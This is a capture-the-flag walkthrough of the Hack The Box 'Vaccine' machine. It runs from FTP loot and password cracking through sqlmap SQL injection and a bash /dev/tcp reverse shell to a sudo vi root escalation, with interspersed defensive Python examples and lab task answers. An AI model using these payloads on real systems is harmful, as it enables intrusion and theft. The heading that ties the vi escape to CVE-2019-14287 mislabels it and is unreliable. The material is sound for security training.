#14 Vaccine - Starting Point - Hack The Box || Complete Walkthrough

Penetration testing is not simple: it requires a lot of technical knowledge and the ability to think outside the box. Sometimes you will find simple yet dangerous vulnerabilities; other times you will find vulnerabilities for which public exploits exist, which you can use to get easy access to the system.


In reality, most of the time you will find many different vulnerabilities and misconfigurations that you have to chain together in order to access the target machine, or you will find a system with no vulnerabilities but a weak password that grants you access anyway.

Vaccine is the machine that teaches us that enumeration is always the key, even when the system seems secure. It also teaches us how important password cracking is; it is surprising how many people do not use strong passwords.


Enumeration

Click on Spawn Machine to Find out the TARGET IP.

As usual, we start off with an Nmap scan:

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.185
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 00:51 IST 
Nmap scan report for 10.129.57.185
Host is up (0.32s latency).
Not shown: 996 closed tcp ports (conn-refused) 
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3 
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_ - rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst:                                         
|   STAT:                                
| FTP server status: 
|      Connected to ::ffff:10.10.14.183       
|      Logged in as ftpuser
|      TYPE: ASCII    
|      No session bandwidth limit  
|      Session timeout in seconds is 300 
|      Control connection is plain text 
|      Data connections will be plain text    
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable 
|_End of status  
22/tcp   open     ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)  
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)    
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp   open     http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /: 
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
2008/tcp filtered conf
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
┌──(mrdev㉿mrdev)-[~]   
└─$  

There are three open ports: 21 (FTP), 22 (SSH), and 80 (HTTP).

Since we don't have any credentials for the SSH service, we start by enumerating port 21, because Nmap shows that it allows anonymous login.



Accessing FTP Server Anonymously with FTP Client Tool

We can see that a backup.zip file is available, so we download it. It will be saved in the directory from which we established the FTP connection.

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.185  
Connected to 10.129.57.185.
220 (vsFTPd 3.0.3)
Name (10.129.57.185:mrdev): Anonymous
331 Please specify the password.
Password:          #password Not required
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files. 
ftp> dir        # List the Files and Directory
229 Entering Extended Passive Mode (|||10967|) 
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip   
226 Directory send OK. 
ftp> get backup.zip         # Download the backup.zip file
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10129|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |**************************************************************************|  2533      514.05 KiB/s    00:00 ETA 226 Transfer complete.
2533 bytes received in 00:00 (7.79 KiB/s) 
ftp> bye 
221 Goodbye.
┌──(mrdev㉿mrdev)-[~]    
└─$  

Run ls to check that the file was downloaded:

┌──(mrdev㉿mrdev)-[~]  
└─$ ls
backup.zip   Document    nc.exe    prod.dtsConfig            wordlists
Desktop     Downloads   impacket  pass.txt  Public          thinclient_drives 
dirbuster   forloop.sh  Music     Pictures  rockyou.txt     Videos  

We will try to extract backup.zip with the unzip command:

┌──(mrdev㉿mrdev)-[~]
└─$ unzip backup.zip   
Archive:  backup.zip 
[backup.zip] index.php password:    # The archive asks for a password
skipping: index.php               incorrect password
skipping: style.css               incorrect password  
┌──(mrdev㉿mrdev)-[~]
└─$

We will have to crack the password somehow. The tool we will use for this task is John the Ripper.



Decrypting Password-Protected ZIP Files with John The Ripper

John the Ripper comes pre-installed on Parrot OS and Kali Linux; if you don't have it, you can install it from the repository:

# sudo apt-get install john

To crack the password, we first have to convert the ZIP into a hash using the zip2john utility that ships with John the Ripper.

┌──(mrdev㉿mrdev)-[~]
└─$ zip2john backup.zip > hashes

Once the hash file is written, run the command below to load the wordlist and run a dictionary attack against the hash stored in the file hashes.

┌──(mrdev㉿mrdev)-[~]  
└─$ john --wordlist=rockyou.txt  hashes    
Using default input encoding: UTF-8    
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads   
Press 'q' or Ctrl-C to abort, almost any other key for status 
741852963         (backup.zip)
1g 0:00:00:00 DONE (2021-12-29 01:08) 1.694g/s 13884p/s 13884c/s 13884C/s 123456..whitetiger 
Use the "--show" option to display all of the cracked passwords reliably 
Session completed.
┌──(mrdev㉿mrdev)-[~]
└─$

We can see the cracked password: 741852963

Now run the unzip command to extract the files.

┌──(mrdev㉿mrdev)-[~]
└─$ unzip backup.zip  
Archive:  backup.zip
[backup.zip] index.php password:  741852963
inflating: index.php   
inflating: style.css     
┌──(mrdev㉿mrdev)-[~]   
└─$ ls  
backup.zip  Documents   hashes     Music     Pictures        rockyou.txt  thinclient_drives 
Desktop     Downloads   impacket   nc.exe    prod.dtsConfig  style.css     Videos  
dirbuster   forloop.sh  index.php   pass.txt  Public          Templates    wordlists     
┌──(mrdev㉿mrdev)-[~]   
└─$

Let's read the index.php file first.

┌──(mrdev㉿mrdev)-[~]   
└─$ cat index.php 
<!DOCTYPE html>
<?php
  session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>
.............................................<more>.............................................................

We can see the admin credentials, which we might be able to use, but the password is stored as a hash. The code shows it is an unsalted MD5 digest, so let's try to crack it online (https://crackstation.net/).

The cracked password is qwerty789. Now we open the web browser to enumerate port 80 and see where we can log in.

We land on a login page; supplying the username we found and the cracked password logs us in successfully!
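As an added example (not code from the machine or from the original post), here is the index.php check rewritten in Python beside a hardened version: a per-user salt, scrypt as a slow memory-hard KDF, and a constant-time comparison, plus an audit helper that flags a bare digest like the one in index.php. The scrypt cost parameters are assumed values, not anything from the page.

```python
"""The admin check in index.php versus a hardened replacement.

index.php compares md5($_POST['password']) with a hardcoded, unsalted MD5
digest. An unsalted fast hash of a weak password falls to a wordlist lookup
(which is how the page recovers it). The hardened version uses a per-user
salt, a memory-hard KDF (scrypt) and a constant-time comparison.
"""
import hashlib
import hmac
import os
import re

# Digest copied from the index.php shown above (the vulnerable scheme).
ADMIN_MD5 = "2cb42f8734ea607eefed3b70af13bbd3"


def vulnerable_check(username, password):
    """Mirrors index.php: unsalted MD5 compared against a hardcoded digest."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return username == "admin" and digest == ADMIN_MD5


# scrypt cost parameters (assumed, not from the page); n=2**14, r=8, p=1 is a
# common interactive-login setting, about 16 MiB of memory per verification.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password, salt=b""):
    """Return 'scrypt$<salt hex>$<digest hex>'; fresh 16-byte salt unless given."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "scrypt$%s$%s" % (salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time.

    Malformed records return False instead of raising, so the error path does
    not reveal a corrupt record versus a wrong password."""
    try:
        scheme, salt_hex, digest_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    except ValueError:
        return False
    if scheme != "scrypt" or not salt or not expected:
        return False
    actual = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=len(expected))
    return hmac.compare_digest(actual, expected)


# 32/40/64 hex chars = bare MD5/SHA-1/SHA-256: no salt and no work factor.
_RAW_DIGEST = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.I)


def audit_stored_hash(stored):
    """Classify a stored credential the way a code review of index.php should."""
    if _RAW_DIGEST.match(stored):
        return "weak: bare unsalted digest, a wordlist lookup is enough"
    if stored.startswith("scrypt$"):
        return "ok: salted memory-hard KDF"
    return "unknown scheme, review manually"


if __name__ == "__main__":
    print(audit_stored_hash(ADMIN_MD5))
    record = hash_password("correct horse")
    print(record, verify_password("correct horse", record))
```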


Foothold

The dashboard has nothing special in it; however, it has a catalog, which is likely backed by a database.

Let's submit any search query:

Looking at the URL, we can see a search parameter that is responsible for searching the catalog. We could test it manually for SQL injection, but instead we will use a tool called sqlmap.



Acquiring OS Shell Access via SQL Injection with sqlmap

sqlmap comes pre-installed on Parrot OS and Kali Linux; if you don't have it, install it from the repository with the following command:

# sudo apt-get install sqlmap

To see how to use it, type the following command:

┌─[mrdev@TS]─[~]
└──╼ $ sqlmap --help
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users
┌─[mrdev@TS]─[~]
└──╼ $

We provide the URL and the session cookie to sqlmap so it can find the vulnerability. We have to supply the cookie because the dashboard requires an authenticated session.

To grab the cookie, we can intercept any request in Burp Suite and copy it from there; alternatively, you can install a browser extension called cookie-editor.

Once installed, copy the PHPSESSID cookie value from the extension. In the raw HTTP request the cookie is carried in the Cookie header.

Open the terminal and type the following command:

┌──(mrdev㉿mrdev)-[~] 
└─$ sqlmap -u 'http://10.129.57.185/dashboard.php?search=any+query' --cookie="PHPSESSID=t6m2fbdvuoq41dov97pobkd3ku"

The tool will ask some questions; you can answer 'Yes' or 'No', or just press ENTER for the default answer.

        ___
       __H__  
 ___ ___[,]_____ ___ ___  {1.5.12#stable}   
|_ -| . [']     | .'| . |    
|___|_  [)]_|_|_|__,|  _|  
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    
[*] starting @ 01:50:33 /2021-12-29/
[01:50:35] [INFO] testing connection to the target URL 
[01:50:36] [INFO] checking if the target is protected by some kind of WAF/IPS  
[01:50:37] [INFO] testing if the target URL content is stable
[01:50:38] [INFO] target URL content is stable  
[01:50:38] [INFO] testing if GET parameter 'search' is dynamic
[01:50:38] [WARNING] GET parameter 'search' does not appear to be dynamic    
[01:50:39] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[01:50:39] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y  
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:51:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:51:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:51:20] [INFO] testing 'Generic inline queries'
[01:51:20] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'  
[01:51:22] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[01:51:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' 
[01:51:23] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[01:51:23] [INFO] testing 'PostgreSQL inline queries'
[01:51:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'   
[01:51:23] [WARNING] time-based comparison requires larger statistical model, please wait..... (done) 
[01:51:36] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[01:51:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'  
[01:51:47] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable  
[01:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'   
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y   

From this output, the important part is the following:

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

The tool confirmed that the target is vulnerable to SQL injection, which is everything we needed to know. 

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y  
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests: 
---
Parameter: search (GET)
Type: boolean-based blind    
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based  
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries  
Title: PostgreSQL > 8.1 stacked queries (comment)  
Payload: search=any query';SELECT PG_SLEEP(5)--  
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind 
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd 
---
[01:51:51] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan) 
web application technology: Apache 2.4.41 
[01:51:54] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/10.129.57.185' 
[*] ending @ 01:51:54 /2021-12-29/  
┌──(mrdev㉿mrdev)-[~]   
└─$  
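As an added example, not part of the original walkthrough, here is the detection side of what sqlmap just did: a small Python scanner that parses Apache combined-format access logs and flags the injection payload shapes reported above (PostgreSQL CAST and CHR() tricks, PG_SLEEP, stacked queries, and COPY ... FROM PROGRAM). The log lines are constructed, and the sqlmap User-Agent string format is an assumption based on 1.5.x releases.

```python
"""Spot the PostgreSQL injection payloads sqlmap reported for the 'search'
parameter when they appear in Apache access logs.

The sample log lines are constructed here (not taken from the box) but carry
the exact payload shapes sqlmap printed above: boolean-based CAST, error-based
CHR() concatenation, stacked PG_SLEEP and time-based PG_SLEEP, along with
sqlmap's default User-Agent (format assumed from the 1.5.x releases).
"""
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Each rule is named after the sqlmap technique it corresponds to on this box.
RULES = [
    ("time-based blind / stacked", re.compile(r"\bPG_SLEEP\s*\(", re.I)),
    ("boolean-based blind (CAST)", re.compile(r"\bCAST\s*\(.*\bAS\s+NUMERIC\s*\)", re.I)),
    ("error-based (CHR concat)", re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
    ("stacked queries", re.compile(r"'\s*;\s*(?:SELECT|COPY|INSERT|UPDATE|DROP)\b", re.I)),
    ("command execution (COPY FROM PROGRAM)", re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)),
    ("quote + comment terminator", re.compile(r"'.*--\s*\w*$")),
]
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)


def analyze(line):
    """Return {param: [technique, ...]} for one log line, plus an 'agent' entry
    when the User-Agent is sqlmap's; {} when clean, None if the line doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = {}
    for name, values in parse_qs(urlsplit(m["path"]).query, keep_blank_values=True).items():
        for value in values:
            value = unquote_plus(value)  # second decode pass catches double-encoded payloads
            hits = [label for label, rx in RULES if rx.search(value)]
            if hits:
                findings[name] = sorted(set(findings.get(name, [])) | set(hits))
    if SQLMAP_UA.search(m["agent"]):
        findings["agent"] = ["sqlmap user-agent"]
    return findings


def scan(lines):
    """Return [(index, findings)] for every line with at least one finding."""
    out = []
    for i, line in enumerate(lines):
        findings = analyze(line)
        if findings:
            out.append((i, findings))
    return out


def make_line(search_value, agent="Mozilla/5.0"):
    """Build a constructed combined-format line for a GET to /dashboard.php."""
    return ('10.10.14.183 - - [29/Dec/2021:01:51:22 +0530] '
            '"GET /dashboard.php?search=%s HTTP/1.1" 200 2048 "-" "%s"' % (quote(search_value), agent))


UA = "sqlmap/1.5.12#stable (https://sqlmap.org)"  # assumed default UA format
SAMPLE_LOG = [  # constructed; payloads copied from sqlmap's report above
    make_line("any query"),
    make_line("any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE "
              "CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf", UA),
    make_line("any query';SELECT PG_SLEEP(5)--", UA),
    make_line("any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd", UA),
    "not a combined-format line at all",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, findings)
```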

Now we run sqlmap once more with the --os-shell flag, which lets us execute operating system commands through the injection.

┌──(mrdev㉿mrdev)-[~]   
└─$ sqlmap -u 'http://10.129.57.185/dashboard.php?search=any+query' --cookie="PHPSESSID=t6m2fbdvuoq41dov97pobkd3ku" --os-shell 
        ___
       __H__  
 ___ ___[)]_____ ___ ___  {1.5.12#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:14:36 /2021-12-29/ 
[02:14:36] [INFO] resuming back-end DBMS 'postgresql'
[02:14:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---  
Parameter: search (GET) 
Type: boolean-based blind  
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf  
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause  
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries 
Title: PostgreSQL > 8.1 stacked queries (comment) 
Payload: search=any query';SELECT PG_SLEEP(5)--   
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind  
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd 
---      
[02:14:38] [INFO] the back-end DBMS is PostgreSQL     
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL 
[02:14:38] [INFO] fingerprinting the back-end DBMS operating system
[02:14:39] [INFO] the back-end DBMS operating system is Linux 
[02:14:40] [INFO] testing if current user is DBA    
[02:14:40] [INFO] retrieved: '1'
[02:14:41] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[02:14:41] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER  
os-shell>

We got a shell, but it is neither stable nor interactive.


Establishing Reverse Shell via OS Shell Obtained from SQLMap

To make it much more stable, we will use the reverse shell payload:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.183/443 0>&1"

Before running this, start a Netcat listener on the port used in the payload:

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11> nc -lvnp 443
listening on [any] 443 ...

Once Netcat is listening, we execute the payload:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.183/443 0>&1" 
do you want to retrieve the command standard output? [Y/n/a] Y
[02:15:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) 

Let's check whether the connection came back:

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11>nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.183] from (UNKNOWN) [10.129.57.185] 50306   
bash: cannot set terminal process group (3472): Inappropriate ioctl for device
bash: no job control in this shell  
postgres@vaccine:/var/lib/postgresql/11/main$ whoami   
whoami    
postgres    
postgres@vaccine:/var/lib/postgresql/11/main$

We have a foothold. Let's quickly make the shell fully interactive:

postgres@vaccine:/var/lib/postgresql/11/main$ SHELL=/bin/bash script -q /dev/null
<gresql/11/main$ SHELL=/bin/bash script -q /dev/null   
postgres@vaccine:/var/lib/postgresql/11/main$

We now have a fully interactive shell.


Privilege Escalation

We are the postgres user, but we don't know its password, which means we cannot check our sudo privileges. We will try to find the password in the web root: the application uses PHP with a SQL back end, so there should be database credentials in cleartext.

First, we move from the PostgreSQL data directory to the web root:

postgres@vaccine:/var/lib/postgresql/11/main$ cd ../../../../..
cd ../../../../..
postgres@vaccine:/$ cd /var/www/html 
cd /var/www/html
postgres@vaccine:/var/www/html$ ls  
ls
bg.png         dashboard.js   index.php    style.css 
dashboard.css  dashboard.php   license.txt  
postgres@vaccine:/var/www/html$

Now let me read the dashboard.php file using the cat command:

postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php  
<!-----------more---------------------->
try {
   $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}
<!-----------more---------------------->
postgres@vaccine:/var/www/html$
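As an added example, not part of the original post, here is a Python check that does what we just did by hand: scan PHP files for pg_connect() strings that embed a password, parsing the libpq key=value format (which accepts the stray spaces around '=' seen in the file above). The sample file contents are constructed; only the dashboard.php connection string is the one from the box.

```python
"""Find cleartext database credentials embedded in web-root PHP files, the
way dashboard.php on this box carries them in a pg_connect() call.

pg_connect() takes a libpq connection string: key=value pairs separated by
whitespace, optional spaces around '=', and single-quoted values (a backslash
escapes a quote or backslash inside them) when a value contains spaces.
The sample files below are constructed; the dashboard.php line is from above.
"""
import re

PG_CONNECT_RE = re.compile(r'pg_connect\s*\(\s*"([^"]*)"', re.I)
# one key=value pair: value is either '...' with backslash escapes or bare up to whitespace
CONNINFO_RE = re.compile(r"(\w+)\s*=\s*(?:'((?:\\.|[^'\\])*)'|(\S+))")


def parse_conninfo(conninfo):
    """Return {key: value} for a libpq-style connection string."""
    parsed = {}
    for m in CONNINFO_RE.finditer(conninfo):
        key, quoted, bare = m.groups()
        value = bare if quoted is None else re.sub(r"\\(.)", r"\1", quoted)
        parsed[key.lower()] = value
    return parsed


def mask(secret):
    """Keep first and last character so a reviewer can match the finding without logging it."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def find_credentials(filename, text):
    """Report every pg_connect() string in `text` that carries a password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in PG_CONNECT_RE.finditer(line):
            info = parse_conninfo(m.group(1))
            if "password" in info:
                findings.append({"file": filename, "line": lineno,
                                 "user": info.get("user", "?"), "db": info.get("dbname", "?"),
                                 "password": mask(info["password"])})
    return findings


def scan_files(files):
    """Run find_credentials over a {filename: contents} mapping."""
    return [f for name, text in files.items() for f in find_credentials(name, text)]


SAMPLE_FILES = {  # constructed sample contents
    "dashboard.php": '<?php\ntry {\n  $conn = pg_connect("host=localhost port=5432 '
                     'dbname=carsdb user= postgres password= P@s5w0rd! ");\n}\n',
    "index.php": "<?php\nsession_start();\n",
    "config.php": "<?php\n$c = pg_connect(\"dbname=app user='web app' password='it\\'s secret'\");\n",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```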

We found a username and password, so we use them to log in over SSH:

┌──(mrdev㉿mrdev)-[~]
└─$ ssh postgres@10.129.57.185
postgres@10.129.57.185's password:  P@s5w0rd!
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
* Documentation:  https://help.ubuntu.com  
* Management:     https://landscape.canonical.com  
* Support:        https://ubuntu.com/advantage   
System information as of Tue 28 Dec 2021 09:24:36 PM UTC 
System load:  0.0               Processes:             187   
Usage of /:   32.6% of 8.73GB   Users logged in:       0 
Memory usage: 19%               IP address for ens160: 10.129.57.185    
Swap usage:   0%  
0 updates can be installed immediately.    
0 of these updates are security updates. 
The list of available updates is more than a week old. 
To check for new updates run: sudo apt update    
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
Last login: Tue Dec 28 21:02:11 2021 from 10.10.14.183  
postgres@vaccine:~$

The user flag is in the home directory:

postgres@vaccine:~$ ls
11  user.txt   
postgres@vaccine:~$ cat user.txt
ec*************************7
postgres@vaccine:~$

We run sudo -l to see what privileges we have:

postgres@vaccine:~$ sudo -l
[sudo] password for postgres:     
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass    
User postgres may run the following commands on vaccine: 
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf 
postgres@vaccine:~$


sudo privilege escalation via vi editor (CVE-2019-14287)

So we can run vi as root on /etc/postgresql/11/main/pg_hba.conf. Open the file with sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf, then in vi's command mode type :!/bin/bash and hit Enter to spawn a root shell.

The root flag is in the root folder:

root@vaccine:/var/lib/postgresql# whoami    
root    
root@vaccine:/var/lib/postgresql# cd /root
root@vaccine:~# ls    
pg_hba.conf  root.txt   snap      
root@vaccine:~# cat root.txt   
dd****************************9   
root@vaccine:~# 

We successfully got the root flag, congratulations!


Task Answers


TASK 1: Besides SSH and HTTP, what other service is hosted on this box?

Ans. FTP

TASK 2: This service can be configured to allow login with any password for a specific username. What is that username?

Ans. anonymous

TASK 3: What is the name of the file downloaded over this service?

Ans. backup.zip

TASK 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?

Ans. zip2john


TASK 5: What is the password for the admin user on the website?

Ans. qwerty789

TASK 6: What option can be passed to sqlmap to try to get command execution via the sql injection?

Ans. --os-shell

TASK 7: What program can the postgres user run as root using sudo?

Ans. vi
